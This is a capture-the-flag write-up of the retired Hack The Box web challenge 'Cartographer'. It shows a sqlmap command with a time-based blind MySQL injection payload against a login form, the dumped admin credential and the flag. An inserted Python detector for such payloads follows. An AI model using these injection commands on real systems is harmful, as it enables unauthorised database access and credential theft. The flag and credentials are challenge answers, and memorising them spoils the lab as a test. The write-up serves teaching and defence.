Cartographer
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Challenge info
Cartographer [by Arrexel]
Some underground hackers are developing a new command and control server. Can you break in and see what they are up to?
The Challenge
Visiting the web page, we see a login form.

Some testing with sqlmap reveals that the login form is vulnerable to SQL injection. The DBMS is MySQL.
Eventually I find that the cartographer DB is the one holding interesting data.
```
$ sqlmap -u http://docker.hackthebox.eu:36230/ -p username,password --data="username=user&password=pass" --dbms=MySQL --level=5 --risk=3 --predict-output --skip="privileges" -D cartographer --exclude-sysdbs --dump
sqlmap identified the following injection point(s) with a total of 143 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=user' AND (SELECT 3085 FROM (SELECT(SLEEP(5)))IYFO) AND 'ECrZ'='ECrZ&password=pass
---
[... skipped for brevity ...]
[15:41:00] [INFO] fetching tables for databases: 'cartographer, information_schema, mysql, performance_schema, sys'
[15:50:10] [INFO] fetching columns for table 'users' in database 'cartographer'
[15:50:10] [INFO] retrieved: username
[15:50:39] [INFO] retrieved: password
[15:51:09] [INFO] fetching entries for table 'users' in database 'cartographer'
Database: cartographer
Table: users
[1 entry]
+----------+------------------------------+
| username | password                     |
+----------+------------------------------+
| admin    | mypasswordisfuckinawesome123 |
+----------+------------------------------+
```
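A defender's view of the time-based payload sqlmap reports above, as an added example that is not part of the original write-up: it scans urlencoded login POST bodies for delay-function calls and quote-breaking values, and treats a delay call paired with a slow response as a confirmed injection rather than a probe. The log records, the 4-second threshold and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Delay primitives used for time-based blind injection on common DBMSs.
DELAY_CALL = re.compile(
    r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE)
# A quote followed by AND/OR: the value closes the string literal and
# continues the WHERE clause.
QUOTE_BREAK = re.compile(r"'\s*(and|or)\b", re.IGNORECASE)
SLOW_SECONDS = 4.0  # assumed threshold, just under the SLEEP(5) in the payload


def score_request(body, elapsed):
    """Return findings for one urlencoded POST body and its response time."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if DELAY_CALL.search(value):
            findings.append((name, "delay-function"))
        if QUOTE_BREAK.search(value):
            findings.append((name, "quote-break"))
    # A delay call that also produced a slow response means the database
    # executed it: the parameter is injectable, not merely probed.
    confirmed = elapsed >= SLOW_SECONDS and any(
        kind == "delay-function" for _, kind in findings)
    return {"findings": findings, "confirmed": confirmed}


def triage(log):
    """Score every (body, elapsed_seconds) record in a request log."""
    return [score_request(body, elapsed) for body, elapsed in log]


# Payload string copied from the sqlmap output in this write-up.
PAYLOAD = "user' AND (SELECT 3085 FROM (SELECT(SLEEP(5)))IYFO) AND 'ECrZ'='ECrZ"

# Constructed log records: (raw POST body, response time in seconds).
SAMPLE_LOG = [
    (urlencode({"username": "admin", "password": "hunter2"}), 0.08),
    (urlencode({"username": "O'Andrews", "password": "x"}), 0.07),   # benign quote
    (urlencode({"username": PAYLOAD, "password": "pass"}), 5.11),    # executed
    (urlencode({"username": "user", "password": PAYLOAD}), 0.09),    # probe only
]

if __name__ == "__main__":
    for (body, elapsed), result in zip(SAMPLE_LOG, triage(SAMPLE_LOG)):
        print(f"{elapsed:5.2f}s  {result}")
```

The third record is the pattern worth alerting on: the delay call appears in the request and the response time matches it, which is exactly the signal sqlmap itself relies on.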
With these credentials, we attempt to log in on the web page.
The credentials work, and we are redirected to: http://docker.hackthebox.eu:36230/panel.php?info=home

Attempting to brute-force the info parameter didn’t help me much further, nor did attempting any SQL injection or path traversal.
In the end I sought some inspiration on the forums, where it was hinted I should try to enter the thing I was looking for: the flag!
The flag
Visiting http://docker.hackthebox.eu:36230/panel.php?info=flag finally reveals the treasure/flag:
```
HTB{Map_Th3_Pl4n3t}
```